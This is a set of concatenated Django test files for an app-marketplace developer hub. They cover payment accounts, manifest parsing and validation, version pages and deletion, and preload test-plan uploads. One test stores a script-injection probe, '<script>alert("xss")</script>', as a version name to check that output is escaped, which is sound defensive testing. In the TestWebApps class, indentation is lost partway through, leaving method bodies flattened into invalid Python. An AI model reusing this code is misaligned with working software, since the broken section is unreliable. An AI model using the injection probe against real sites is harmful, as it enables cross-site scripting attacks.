        eq_(output[0]['portal-url'], settings.BOKU_PORTAL)
class TestPaymentAccount(Patcher, PaymentsBase):
    """Fetching a single payment account merged with Bango details."""

    def setUp(self):
        super(TestPaymentAccount, self).setUp()
        self.url = reverse('mkt.developers.provider.payment_account',
                           args=[self.account.pk])

    def test_login_required(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_get(self):
        # Bango package details are merged into the account JSON.
        package = mock.Mock()
        package.get.return_value = {'full': {'vendorName': 'testval'}}
        self.bango_patcher.package.return_value = package
        res = self.client.get(self.url)
        # '123' comes from the account uri '/bango/package/123'.
        self.bango_patcher.package.assert_called_with('123')
        eq_(res.status_code, 200)
        output = json.loads(res.content)
        eq_(output['account_name'], self.account.name)
        assert 'vendorName' in output, (
            'Details from Bango not getting merged in: %s' % output)
        eq_(output['vendorName'], 'testval')
class TestPaymentAgreement(Patcher, PaymentsBase):
    """GET/POST of the Bango terms-of-service agreement endpoint."""

    def setUp(self):
        super(TestPaymentAgreement, self).setUp()
        self.url = reverse('mkt.developers.provider.agreement',
                           args=[self.account.pk])

    def test_anon(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_get_bango_only_provider(self):
        self.bango_patcher.sbi.agreement.get_object.return_value = {
            'text': 'blah', 'valid': '2010-08-31T00:00:00'}
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['text'], 'blah')

    def test_get_bango_multiple_providers(self):
        # Works even when Bango is not the default provider.
        with self.settings(PAYMENT_PROVIDERS=['bango', 'reference'],
                           DEFAULT_PAYMENT_PROVIDER='reference'):
            self.test_get_bango_only_provider()

    def test_set_bango_only_provider(self):
        self.bango_patcher.sbi.post.return_value = {
            'expires': '2014-08-31T00:00:00',
            'valid': '2014-08-31T00:00:00'}
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['valid'], '2014-08-31T00:00:00')

    def test_set_bango_multiple_providers(self):
        with self.settings(PAYMENT_PROVIDERS=['bango', 'reference'],
                           DEFAULT_PAYMENT_PROVIDER='reference'):
            self.test_set_bango_only_provider()
class TestPaymentAccountsForm(PaymentsBase):
    """The account-list form fragment filtered by provider/app."""
    fixtures = PaymentsBase.fixtures + fixture('webapp_337141')

    def setUp(self):
        super(TestPaymentAccountsForm, self).setUp()
        base_url = reverse('mkt.developers.provider.payment_accounts_form')
        self.url = base_url + '?provider=bango&app_slug=something-something'

    def test_login_required(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_mine(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(res.context['account_list_form']
               .fields['accounts'].choices.queryset.get(), self.account)

    def test_mine_disagreed_tos(self):
        # Accounts without an agreed TOS are excluded from the choices.
        self.account.update(agreed_tos=False)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        self.assertSetEqual(res.context['account_list_form']
                               .fields['accounts'].choices.queryset.all(), [])
class TestPaymentDelete(PaymentsBase):
    """Deleting (deactivating) a payment account."""

    def setUp(self):
        super(TestPaymentDelete, self).setUp()
        self.url = reverse('mkt.developers.provider.delete_payment_account',
                           args=[self.account.pk])

    def test_login_required(self):
        self.client.logout()
        self.assertLoginRequired(self.client.post(self.url, data={}))

    def test_not_mine(self):
        # Other users' accounts 404 rather than leak their existence.
        self.login(UserProfile.objects.get(pk=5497308))
        eq_(self.client.post(self.url, data={}).status_code, 404)

    def test_mine(self):
        # Deletion soft-deletes: the row stays but becomes inactive.
        eq_(self.client.post(self.url, data={}).status_code, 200)
        eq_(PaymentAccount.objects.get(pk=self.account.pk).inactive, True)
########NEW FILE########
__FILENAME__ = test_views_validation
# -*- coding: utf-8 -*-
import codecs
import collections
import json
import os
import tempfile
from django import forms
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from amo.tests.test_helpers import get_image_path
from files.models import FileUpload
from files.utils import WebAppParser
from mkt.developers.views import standalone_hosted_upload
from mkt.files.helpers import copyfileobj
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
class TestWebApps(amo.tests.TestCase, amo.tests.AMOPaths):
def setUp(self):
    # Copy the fixture manifest into storage under a fresh temp name.
    # NOTE(review): tempfile.mktemp only reserves a name (race-prone);
    # the file itself is created via storage.open below.
    self.webapp_path = tempfile.mktemp(suffix='.webapp')
    with storage.open(self.webapp_path, 'wb') as f:
        copyfileobj(open(os.path.join(os.path.dirname(__file__),
                                      'addons', 'mozball.webapp')),
                    f)
    self.tmp_files = []
    self.manifest = dict(name=u'Ivan Krsti\u0107', version=u'1.0',
                         description=u'summary',
                         developer=dict(name=u'Dev Namé'))

def tearDown(self):
    # Remove any temp manifests created via self.webapp().
    for tmp in self.tmp_files:
        storage.delete(tmp)

def webapp(self, data=None, contents='', suffix='.webapp'):
    # Write `data` (as JSON) or raw `contents` to a tracked temp file
    # and return its path.
    tmp = tempfile.mktemp(suffix=suffix)
    self.tmp_files.append(tmp)
    with storage.open(tmp, 'wb') as f:
        f.write(json.dumps(data) if data else contents)
    return tmp

def test_parse(self):
    # Hosted manifest: locales, version and default_locale are parsed.
    wp = WebAppParser().parse(self.webapp_path)
    eq_(wp['guid'], None)
    eq_(wp['type'], amo.ADDON_WEBAPP)
    eq_(wp['description']['en-US'], u'Exciting Open Web development action!')
    # UTF-8 byte string decoded to unicode.
    eq_(wp['description']['es'],
        u'\xa1Acci\xf3n abierta emocionante del desarrollo del Web!')
    eq_(wp['description']['it'],
        u'Azione aperta emozionante di sviluppo di fotoricettore!')
    eq_(wp['version'], '1.0')
    eq_(wp['default_locale'], 'en-US')

def test_parse_packaged(self):
    # Packaged app zip: same fields come from manifest.webapp inside.
    wp = WebAppParser().parse(self.packaged_app_path('mozball.zip'))
    eq_(wp['guid'], None)
    eq_(wp['type'], amo.ADDON_WEBAPP)
    eq_(wp['name']['en-US'], u'Packaged MozillaBall ょ')
    eq_(wp['description']['en-US'], u'Exciting Open Web development action!')
    eq_(wp['description']['es'],
        u'¡Acción abierta emocionante del desarrollo del Web!')
    eq_(wp['description']['it'],
        u'Azione aperta emozionante di sviluppo di fotoricettore!')
    eq_(wp['version'], '1.0')
    eq_(wp['default_locale'], 'en-US')

def test_parse_packaged_BOM(self):
    # A UTF-8 BOM in the manifest must not break parsing.
    wp = WebAppParser().parse(self.packaged_app_path('mozBOM.zip'))
    eq_(wp['guid'], None)
    eq_(wp['type'], amo.ADDON_WEBAPP)
    eq_(wp['name']['en-US'], u'Packaged MozBOM ょ')
    eq_(wp['description']['en-US'], u'Exciting BOM action!')
    eq_(wp['description']['es'], u'¡Acción BOM!')
    eq_(wp['description']['it'], u'Azione BOM!')
    eq_(wp['version'], '1.0')
    eq_(wp['default_locale'], 'en-US')

def test_no_manifest_at_root(self):
    # A zip without manifest.webapp at its root is a ValidationError.
    with self.assertRaises(forms.ValidationError) as exc:
        WebAppParser().parse(
            self.packaged_app_path('no-manifest-at-root.zip'))
    m = exc.exception.messages[0]
    assert m.startswith('The file "manifest.webapp" was not found'), (
        'Unexpected: %s' % m)

def test_no_locales(self):
    # Without a locales block, the description lands on the default locale.
    wp = WebAppParser().parse(self.webapp(dict(name='foo', version='1.0',
                                               description='description',
                                               developer=dict(name='bar'))))
    eq_(wp['description']['en-US'], u'description')
def test_no_description(self):
wp = WebAppParser().parse(self.webapp(dict(name='foo',
version='1.0',
developer=dict(name='bar'))))
eq_(wp['description'], {})
def test_syntax_error(self):
with self.assertRaises(forms.ValidationError) as exc:
WebAppParser().parse(self.webapp(contents='}]'))
m = exc.exception.messages[0]
assert m.startswith('The webapp manifest is not valid JSON.'), (
'Unexpected: %s' % m)
def test_utf8_bom(self):
wm = codecs.BOM_UTF8 + json.dumps(self.manifest, encoding='utf8')
wp = WebAppParser().parse(self.webapp(contents=wm))
eq_(wp['version'], '1.0')
def test_non_ascii(self):
wm = json.dumps(dict(name=u'まつもとゆきひろ', version='1.0',
developer=dict(name=u'まつもとゆきひろ')),
encoding='shift-jis')
wp = WebAppParser().parse(self.webapp(contents=wm))
eq_(wp['name'], {'en-US': u'まつもとゆきひろ'})
@patch('mkt.developers.views.trap_duplicate')
def test_trap_duplicate_skipped_on_standalone(self, trap_duplicate_mock):
self.create_switch('webapps-unique-by-domain')
request = Mock()
request.method = 'POST'
request.POST = {'manifest': ''}
request.return_value = collections.namedtuple('FakeResponse',
'status_code content')
standalone_hosted_upload(request)
assert not trap_duplicate_mock.called
class TestStandaloneValidation(BaseUploadTest):
    """Tests for the standalone (no-app) manifest/package validator pages."""
    fixtures = ['base/users']

    def setUp(self):
        super(TestStandaloneValidation, self).setUp()
        assert self.client.login(username='[email protected]',
                                 password='password')
        # Upload URLs
        self.hosted_upload = reverse(
            'mkt.developers.standalone_hosted_upload')
        self.packaged_upload = reverse(
            'mkt.developers.standalone_packaged_upload')

    def hosted_detail(self, uuid):
        # JSON status URL for a hosted-app upload.
        return reverse('mkt.developers.standalone_upload_detail',
                       args=['hosted', uuid])

    def packaged_detail(self, uuid):
        # JSON status URL for a packaged-app upload.
        return reverse('mkt.developers.standalone_upload_detail',
                       args=['packaged', uuid])

    def upload_detail(self, uuid):
        # Human-readable full validation report URL.
        return reverse('mkt.developers.upload_detail', args=[uuid])

    def test_context(self):
        # The validator page must wire both upload endpoints into the DOM.
        res = self.client.get(reverse('mkt.developers.validate_addon'))
        eq_(res.status_code, 200)
        doc = pq(res.content)
        eq_(doc('#upload-webapp-url').attr('data-upload-url'),
            self.hosted_upload)
        eq_(doc('#upload-app').attr('data-upload-url'), self.packaged_upload)

    def detail_view(self, url_factory, upload):
        """Shared assertions for the JSON detail + full report views."""
        res = self.client.get(url_factory(upload.uuid))
        res_json = json.loads(res.content)
        eq_(res_json['url'], url_factory(upload.uuid))
        eq_(res_json['full_report_url'], self.upload_detail(upload.uuid))
        res = self.client.get(self.upload_detail(upload.uuid))
        eq_(res.status_code, 200)
        doc = pq(res.content)
        assert doc('header h1').text().startswith('Validation Results for ')
        suite = doc('#addon-validator-suite')
        # All apps have a `validateurl` value that corresponds to a hosted app.
        eq_(suite.attr('data-validateurl'), self.hosted_detail(upload.uuid))

    @patch('mkt.developers.tasks._fetch_manifest')
    def test_hosted_detail(self, fetch_manifest):
        # Stub the network fetch with the fixture manifest's contents.
        def update_upload(url, upload):
            with open(os.path.join(os.path.dirname(__file__),
                                   'addons', 'mozball.webapp'), 'r') as data:
                return data.read()
        fetch_manifest.side_effect = update_upload
        res = self.client.post(
            self.hosted_upload, {'manifest': 'http://foo.bar/'}, follow=True)
        eq_(res.status_code, 200)
        uuid = json.loads(res.content)['upload']
        upload = FileUpload.objects.get(uuid=uuid)
        self.detail_view(self.hosted_detail, upload)

    def test_packaged_detail(self):
        data = open(get_image_path('animated.png'), 'rb')
        self.client.post(self.packaged_upload, {'upload': data})
        upload = FileUpload.objects.get(name='animated.png')
        self.detail_view(self.packaged_detail, upload)
########NEW FILE########
__FILENAME__ = test_views_versions
import datetime
import mock
from nose.tools import eq_
import os
from pyquery import PyQuery as pq
from django.conf import settings
import amo
import amo.tests
from amo.tests import req_factory_factory
from addons.models import Addon, AddonUser
from devhub.models import ActivityLog, AppLog
from editors.models import EscalationQueue, EditorSubscription
from files.models import File
from users.models import UserProfile
from versions.models import Version
from mkt.comm.models import CommunicationNote
from mkt.developers.models import PreloadTestPlan
from mkt.developers.views import preload_submit, status
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BasePackagedAppTest
class TestVersion(amo.tests.TestCase):
    """Tests for the dev-hub 'versions' (status) page of a hosted app."""
    fixtures = fixture('group_admin', 'user_999', 'user_admin',
                       'user_admin_group', 'webapp_337141')

    def setUp(self):
        self.client.login(username='[email protected]', password='password')
        self.webapp = self.get_webapp()
        self.url = self.webapp.get_dev_url('versions')

    def get_webapp(self):
        # Re-fetch to see changes made through other connections/views.
        return Addon.objects.get(id=337141)

    def test_nav_link(self):
        r = self.client.get(self.url)
        eq_(pq(r.content)('.edit-addon-nav li.selected a').attr('href'),
            self.url)

    def test_items(self):
        # Hosted apps have no version list or per-version delete modal.
        doc = pq(self.client.get(self.url).content)
        eq_(doc('#version-status').length, 1)
        eq_(doc('#version-list').length, 0)
        eq_(doc('#delete-addon').length, 1)
        eq_(doc('#modal-delete').length, 1)
        eq_(doc('#modal-disable').length, 1)
        eq_(doc('#modal-delete-version').length, 0)

    def test_delete_link(self):
        # Hard "Delete App" link should be visible for only incomplete apps.
        self.webapp.update(status=amo.STATUS_NULL)
        doc = pq(self.client.get(self.url).content)
        eq_(doc('#delete-addon').length, 1)
        eq_(doc('#modal-delete').length, 1)

    def test_pending(self):
        self.webapp.update(status=amo.STATUS_PENDING)
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('#version-status .status-pending').length, 1)
        eq_(doc('#rejection').length, 0)

    def test_public(self):
        eq_(self.webapp.status, amo.STATUS_PUBLIC)
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('#version-status .status-public').length, 1)
        eq_(doc('#rejection').length, 0)

    def test_blocked(self):
        self.webapp.update(status=amo.STATUS_BLOCKED)
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('#version-status .status-blocked').length, 1)
        eq_(doc('#rejection').length, 0)
        assert 'blocked by a site administrator' in doc.text()

    def test_rejected(self):
        # Rejection shows the reviewer's comments; resubmitting flips the
        # app and its files back to pending and logs a resubmit action.
        comments = "oh no you di'nt!!"
        amo.set_user(UserProfile.objects.get(username='admin'))
        amo.log(amo.LOG.REJECT_VERSION, self.webapp,
                self.webapp.current_version, user_id=999,
                details={'comments': comments, 'reviewtype': 'pending'})
        self.webapp.update(status=amo.STATUS_REJECTED)
        (self.webapp.versions.latest()
                            .all_files[0].update(status=amo.STATUS_DISABLED))
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)('#version-status')
        eq_(doc('.status-rejected').length, 1)
        eq_(doc('#rejection').length, 1)
        eq_(doc('#rejection blockquote').text(), comments)
        my_reply = 'fixed just for u, brah'
        r = self.client.post(self.url, {'notes': my_reply,
                                        'resubmit-app': ''})
        self.assertRedirects(r, self.url, 302)
        webapp = self.get_webapp()
        eq_(webapp.status, amo.STATUS_PENDING,
            'Reapplied apps should get marked as pending')
        eq_(webapp.versions.latest().all_files[0].status, amo.STATUS_PENDING,
            'Files for reapplied apps should get marked as pending')
        action = amo.LOG.WEBAPP_RESUBMIT
        assert AppLog.objects.filter(
            addon=webapp, activity_log__action=action.id).exists(), (
                "Didn't find `%s` action in logs." % action.short)

    def test_no_ratings_no_resubmit(self):
        # With the IARC switch on, resubmission requires at least one
        # content rating.
        self.create_switch('iarc')
        self.webapp.update(status=amo.STATUS_REJECTED)
        r = self.client.post(self.url, {'notes': 'lol',
                                        'resubmit-app': ''})
        eq_(r.status_code, 403)
        self.webapp.content_ratings.create(ratings_body=0, rating=0)
        r = self.client.post(self.url, {'notes': 'lol',
                                        'resubmit-app': ''})
        self.assert3xx(r, self.webapp.get_dev_url('versions'))

    def test_comm_thread_after_resubmission(self):
        # Resubmitting creates a single communication note with the
        # developer's reply as its body.
        self.create_switch('comm-dashboard')
        self.webapp.update(status=amo.STATUS_REJECTED)
        amo.set_user(UserProfile.objects.get(username='admin'))
        (self.webapp.versions.latest()
                            .all_files[0].update(status=amo.STATUS_DISABLED))
        my_reply = 'no give up'
        self.client.post(self.url, {'notes': my_reply,
                                    'resubmit-app': ''})
        notes = CommunicationNote.objects.all()
        eq_(notes.count(), 1)
        eq_(notes[0].body, my_reply)

    def test_rejected_packaged(self):
        # Same rejection display as test_rejected, but for a packaged app.
        self.webapp.update(is_packaged=True)
        comments = "oh no you di'nt!!"
        amo.set_user(UserProfile.objects.get(username='admin'))
        amo.log(amo.LOG.REJECT_VERSION, self.webapp,
                self.webapp.current_version, user_id=999,
                details={'comments': comments, 'reviewtype': 'pending'})
        self.webapp.update(status=amo.STATUS_REJECTED)
        (self.webapp.versions.latest()
                            .all_files[0].update(status=amo.STATUS_DISABLED))
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)('#version-status')
        eq_(doc('.status-rejected').length, 1)
        eq_(doc('#rejection').length, 1)
        eq_(doc('#rejection blockquote').text(), comments)
@mock.patch('mkt.webapps.tasks.update_cached_manifests.delay', new=mock.Mock)
class TestAddVersion(BasePackagedAppTest):
    """Tests for uploading a new version of a packaged app."""

    def setUp(self):
        super(TestAddVersion, self).setUp()
        self.app = amo.tests.app_factory(
            complete=True, is_packaged=True, version_kw=dict(version='1.0'))
        self.url = self.app.get_dev_url('versions')
        self.user = UserProfile.objects.get(username='regularuser')
        AddonUser.objects.create(user=self.user, addon=self.app)

    def _post(self, expected_status=200):
        """POST the prepared upload as a new version; return the response."""
        res = self.client.post(self.url, {'upload': self.upload.pk,
                                          'upload-version': ''})
        eq_(res.status_code, expected_status)
        return res

    def test_post(self):
        # The uploaded package (1.0) becomes the latest, pending version.
        self.app.current_version.update(version='0.9',
                                        created=self.days_ago(1))
        self._post(302)
        version = self.app.versions.latest()
        eq_(version.version, '1.0')
        eq_(version.all_files[0].status, amo.STATUS_PENDING)

    def test_post_subscribers(self):
        # Same test as above, but add a suscriber. We only want to make sure
        # we are not causing a traceback because of that.
        reviewer = UserProfile.objects.create(email='[email protected]')
        self.grant_permission(reviewer, 'Apps:Review')
        EditorSubscription.objects.create(addon=self.app, user=reviewer)
        self.app.current_version.update(version='0.9',
                                        created=self.days_ago(1))
        self._post(302)
        version = self.app.versions.latest()
        eq_(version.version, '1.0')
        eq_(version.all_files[0].status, amo.STATUS_PENDING)

    def test_unique_version(self):
        # Uploading a version number that already exists is a form error.
        res = self._post(200)
        self.assertFormError(res, 'upload_form', 'upload',
                             'Version 1.0 already exists')

    def test_pending_on_new_version(self):
        # Test app rejection, then new version, updates app status to pending.
        self.app.current_version.update(version='0.9',
                                        created=self.days_ago(1))
        self.app.update(status=amo.STATUS_REJECTED)
        files = File.objects.filter(version__addon=self.app)
        files.update(status=amo.STATUS_DISABLED)
        self._post(302)
        self.app.reload()
        version = self.app.versions.latest()
        eq_(version.version, '1.0')
        eq_(version.all_files[0].status, amo.STATUS_PENDING)
        eq_(self.app.status, amo.STATUS_PENDING)

    @mock.patch('mkt.developers.views.run_validator')
    def test_prefilled_features(self, run_validator_):
        # Features detected by the validator are pre-checked on the new
        # version's feature profile.
        run_validator_.return_value = '{"feature_profile": ["apps", "audio"]}'
        self.app.current_version.update(version='0.9',
                                        created=self.days_ago(1))
        # All features should be disabled.
        features = self.app.current_version.features.to_dict()
        eq_(any(features.values()), False)
        self._post(302)
        # In this new version we should be prechecked new ones.
        features = self.app.versions.latest().features.to_dict()
        for key, feature in features.iteritems():
            eq_(feature, key in ('has_apps', 'has_audio'))

    def test_blocklist_on_new_version(self):
        # Test app blocked, then new version, doesn't update app status, and
        # app shows up in escalation queue.
        self.app.current_version.update(version='0.9',
                                        created=self.days_ago(1))
        self.app.update(status=amo.STATUS_BLOCKED)
        files = File.objects.filter(version__addon=self.app)
        files.update(status=amo.STATUS_DISABLED)
        self._post(302)
        version = self.app.versions.latest()
        eq_(version.version, '1.0')
        eq_(version.all_files[0].status, amo.STATUS_PENDING)
        self.app.update_status()
        eq_(self.app.status, amo.STATUS_BLOCKED)
        assert EscalationQueue.objects.filter(addon=self.app).exists(), (
            'App not in escalation queue')

    def test_new_version_when_incomplete(self):
        # An incomplete app becomes pending once a new version is uploaded.
        self.app.current_version.update(version='0.9',
                                        created=self.days_ago(1))
        self.app.update(status=amo.STATUS_NULL)
        files = File.objects.filter(version__addon=self.app)
        files.update(status=amo.STATUS_DISABLED)
        self._post(302)
        self.app.reload()
        version = self.app.versions.latest()
        eq_(version.version, '1.0')
        eq_(version.all_files[0].status, amo.STATUS_PENDING)
        eq_(self.app.status, amo.STATUS_PENDING)

    def test_vip_app_added_to_escalation_queue(self):
        # VIP apps are always escalated on new-version upload.
        self.app.current_version.update(version='0.9',
                                        created=self.days_ago(1))
        self.app.update(vip_app=True)
        self._post(302)
        assert EscalationQueue.objects.filter(addon=self.app).exists(), (
            'VIP App not in escalation queue')
class TestVersionPackaged(amo.tests.WebappTestCase):
    """Tests for the versions page and version deletion of a packaged app."""
    fixtures = fixture('user_999', 'webapp_337141')

    def setUp(self):
        super(TestVersionPackaged, self).setUp()
        assert self.client.login(username='[email protected]',
                                 password='password')
        self.app.update(is_packaged=True)
        self.app = self.get_app()
        self.url = self.app.get_dev_url('versions')
        self.delete_url = self.app.get_dev_url('versions.delete')

    def test_items_packaged(self):
        # Packaged apps additionally show the version list and the
        # per-version delete modal.
        doc = pq(self.client.get(self.url).content)
        eq_(doc('#version-status').length, 1)
        eq_(doc('#version-list').length, 1)
        eq_(doc('#delete-addon').length, 1)
        eq_(doc('#modal-delete').length, 1)
        eq_(doc('#modal-disable').length, 1)
        eq_(doc('#modal-delete-version').length, 1)

    def test_version_list_packaged(self):
        self.app.update(is_packaged=True)
        amo.tests.version_factory(addon=self.app, version='2.0',
                                  file_kw=dict(status=amo.STATUS_PENDING))
        self.app = self.get_app()
        doc = pq(self.client.get(self.url).content)
        eq_(doc('#version-status').length, 1)
        eq_(doc('#version-list tbody tr').length, 2)
        # 1 pending and 1 public.
        eq_(doc('#version-list span.status-pending').length, 1)
        eq_(doc('#version-list span.status-public').length, 1)
        # Check version strings and order of versions.
        eq_(map(lambda x: x.text, doc('#version-list h4 a')),
            ['2.0', '1.0'])
        # There should be 2 delete buttons.
        eq_(doc('#version-list a.delete-version.button').length, 2)
        # Check download url.
        eq_(doc('#version-list a.download').eq(0).attr('href'),
            self.app.versions.all()[0].all_files[0].get_url_path(''))
        eq_(doc('#version-list a.download').eq(1).attr('href'),
            self.app.versions.all()[1].all_files[0].get_url_path(''))

    def test_delete_version(self):
        version = self.app.versions.latest()
        version.update(version='<script>alert("xss")</script>')
        res = self.client.get(self.url)
        # The raw version string must never reach the page; the template
        # must emit only the HTML-escaped form.
        # BUG FIX: the second assertion used to re-check the raw
        # '<script>alert(' string, directly contradicting the first
        # assertion (it could never pass); it must check the escaped form.
        assert not '<script>alert(' in res.content
        assert '&lt;script&gt;alert(' in res.content
        # Now do the POST to delete.
        res = self.client.post(self.delete_url, dict(version_id=version.pk),
                               follow=True)
        assert not Version.objects.filter(pk=version.pk).exists()
        eq_(ActivityLog.objects.filter(action=amo.LOG.DELETE_VERSION.id)
                               .count(), 1)
        # Since this was the last version, the app status should be incomplete.
        eq_(self.get_app().status, amo.STATUS_NULL)
        # Check xss in success flash message.
        # Same fix as above: expect the escaped form, not the raw payload.
        assert not '<script>alert(' in res.content
        assert '&lt;script&gt;alert(' in res.content
        # Test that the soft deletion works pretty well.
        eq_(self.app.versions.count(), 0)
        # We can't use `.reload()` :(
        version = Version.with_deleted.filter(addon=self.app)
        eq_(version.count(), 1)
        # Test that the status of the "deleted" version is STATUS_DELETED.
        eq_(str(version[0].status[0]),
            str(amo.MKT_STATUS_CHOICES[amo.STATUS_DELETED]))

    def test_anonymous_delete_redirects(self):
        self.client.logout()
        version = self.app.versions.latest()
        res = self.client.post(self.delete_url, dict(version_id=version.pk))
        self.assertLoginRedirects(res, self.delete_url)

    def test_non_author_no_delete_for_you(self):
        # Users with no role on the app may not delete its versions.
        self.client.logout()
        assert self.client.login(username='[email protected]',
                                 password='password')
        version = self.app.versions.latest()
        res = self.client.post(self.delete_url, dict(version_id=version.pk))
        eq_(res.status_code, 403)

    @mock.patch.object(Version, 'delete')
    def test_roles_and_delete(self, mock_version):
        # Only owner and developer roles may delete a version; everyone
        # else gets a 403.
        user = UserProfile.objects.get(email='[email protected]')
        addon_user = AddonUser.objects.create(user=user, addon=self.app)
        allowed = [amo.AUTHOR_ROLE_OWNER, amo.AUTHOR_ROLE_DEV]
        for role in [r[0] for r in amo.AUTHOR_CHOICES]:
            self.client.logout()
            addon_user.role = role
            addon_user.save()
            assert self.client.login(username='[email protected]',
                                     password='password')
            version = self.app.versions.latest()
            res = self.client.post(self.delete_url,
                                   dict(version_id=version.pk))
            if role in allowed:
                self.assert3xx(res, self.url)
                assert mock_version.called, ('Unexpected: `Version.delete` '
                                             'should have been called.')
                mock_version.reset_mock()
            else:
                eq_(res.status_code, 403)

    def test_cannot_delete_blocked(self):
        v = self.app.versions.latest()
        f = v.all_files[0]
        f.update(status=amo.STATUS_BLOCKED)
        res = self.client.post(self.delete_url, dict(version_id=v.pk))
        eq_(res.status_code, 403)

    def test_dev_cannot_blocklist(self):
        url = self.app.get_dev_url('blocklist')
        res = self.client.post(url)
        eq_(res.status_code, 403)

    @mock.patch('lib.crypto.packaged.os.unlink', new=mock.Mock)
    def test_admin_can_blocklist(self):
        # Blocklisting creates one extra (blocked) version and flips the
        # app and its newest file to STATUS_BLOCKED.
        self.grant_permission(UserProfile.objects.get(username='regularuser'),
                              'Apps:Configure')
        assert self.client.login(username='[email protected]',
                                 password='password')
        v_count = self.app.versions.count()
        url = self.app.get_dev_url('blocklist')
        res = self.client.post(url)
        self.assert3xx(res, self.app.get_dev_url('versions'))
        app = self.app.reload()
        eq_(app.versions.count(), v_count + 1)
        eq_(app.status, amo.STATUS_BLOCKED)
        eq_(app.versions.latest().files.latest().status, amo.STATUS_BLOCKED)
class TestPreloadSubmit(amo.tests.TestCase):
    """Tests for submitting a preload test plan (PDF/XLS) for an app."""
    fixtures = fixture('group_admin', 'user_admin', 'user_admin_group',
                       'webapp_337141')

    def setUp(self):
        self.create_switch('preload-apps')
        self.user = UserProfile.objects.get(username='admin')
        self.login(self.user)
        self.webapp = Addon.objects.get(id=337141)
        self.url = self.webapp.get_dev_url('versions')
        self.home_url = self.webapp.get_dev_url('preload_home')
        self.submit_url = self.webapp.get_dev_url('preload_submit')
        # Fixture files: only PDF and XLS are accepted test-plan formats.
        path = os.path.dirname(os.path.abspath(__file__))
        self.test_pdf = path + '/files/test.pdf'
        self.test_xls = path + '/files/test.xls'

    def _submit_pdf(self):
        """Submit the PDF fixture through the view and return the response."""
        f = open(self.test_pdf, 'r')
        req = req_factory_factory(self.submit_url, user=self.user, post=True,
                                  data={'agree': True, 'test_plan': f})
        return preload_submit(req, self.webapp.slug)

    def test_get_200(self):
        eq_(self.client.get(self.home_url).status_code, 200)
        eq_(self.client.get(self.submit_url).status_code, 200)

    @mock.patch('mkt.developers.views.save_test_plan')
    @mock.patch('mkt.developers.views.messages')
    def test_preload_on_status_page(self, noop1, noop2):
        # Before submission the status page links to the preload home;
        # afterwards it links straight to the submit page.
        req = req_factory_factory(self.url, user=self.user)
        r = status(req, self.webapp.slug)
        doc = pq(r.content)
        eq_(doc('#preload .listing-footer a').attr('href'),
            self.webapp.get_dev_url('preload_home'))
        assert doc('#preload .not-submitted')
        self._submit_pdf()
        req = req_factory_factory(self.url, user=self.user)
        r = status(req, self.webapp.slug)
        doc = pq(r.content)
        eq_(doc('#preload .listing-footer a').attr('href'),
            self.webapp.get_dev_url('preload_submit'))
        assert doc('#preload .submitted')

    def _assert_submit(self, endswith, content_type, save_mock):
        """Assert one PreloadTestPlan exists and save_test_plan was called
        with the uploaded file, generated filename, and the app."""
        test_plan = PreloadTestPlan.objects.get()
        eq_(test_plan.addon, self.webapp)
        assert test_plan.filename.startswith('test_plan_')
        assert test_plan.filename.endswith(endswith)
        self.assertCloseToNow(test_plan.last_submission)
        eq_(save_mock.call_args[0][0].content_type, content_type)
        assert save_mock.call_args[0][1].startswith('test_plan')
        eq_(save_mock.call_args[0][2], self.webapp)

    @mock.patch('mkt.developers.views.save_test_plan')
    @mock.patch('mkt.developers.views.messages')
    def test_submit_pdf(self, noop, save_mock):
        r = self._submit_pdf()
        self.assert3xx(r, self.url)
        self._assert_submit('pdf', 'application/pdf', save_mock)

    @mock.patch('mkt.developers.views.save_test_plan')
    @mock.patch('mkt.developers.views.messages')
    def test_submit_xls(self, noop, save_mock):
        f = open(self.test_xls, 'r')
        req = req_factory_factory(self.submit_url, user=self.user, post=True,
                                  data={'agree': True, 'test_plan': f})
        r = preload_submit(req, self.webapp.slug)
        self.assert3xx(r, self.url)
        self._assert_submit('xls', 'application/vnd.ms-excel', save_mock)

    @mock.patch('mkt.developers.views.save_test_plan')
    @mock.patch('mkt.developers.views.messages')
    def test_submit_bad_file(self, noop, save_mock):
        # Uploading a non-PDF/XLS file (this .py file) is a form error.
        f = open(os.path.abspath(__file__), 'r')
        req = req_factory_factory(self.submit_url, user=self.user, post=True,
                                  data={'agree': True, 'test_plan': f})
        r = preload_submit(req, self.webapp.slug)
        eq_(r.status_code, 200)
        eq_(PreloadTestPlan.objects.count(), 0)
        assert not save_mock.called
        assert ('Invalid file type.' in
                pq(r.content)('.test_plan .errorlist').text())

    @mock.patch('mkt.developers.views.save_test_plan')
    @mock.patch('mkt.developers.views.messages')
    def test_submit_no_file(self, noop, save_mock):
        req = req_factory_factory(self.submit_url, user=self.user, post=True,
                                  data={'agree': True})
        r = preload_submit(req, self.webapp.slug)
        eq_(r.status_code, 200)
        eq_(PreloadTestPlan.objects.count(), 0)
        assert not save_mock.called
        assert 'required' in pq(r.content)('.test_plan .errorlist').text()

    @mock.patch('mkt.developers.views.save_test_plan')
    @mock.patch('mkt.developers.views.messages')
    def test_submit_no_agree(self, noop, save_mock):
        f = open(self.test_xls, 'r')
        req = req_factory_factory(self.submit_url, user=self.user, post=True,
                                  data={'test_plan': f})
        r = preload_submit(req, self.webapp.slug)
        eq_(r.status_code, 200)
        eq_(PreloadTestPlan.objects.count(), 0)
        assert not save_mock.called
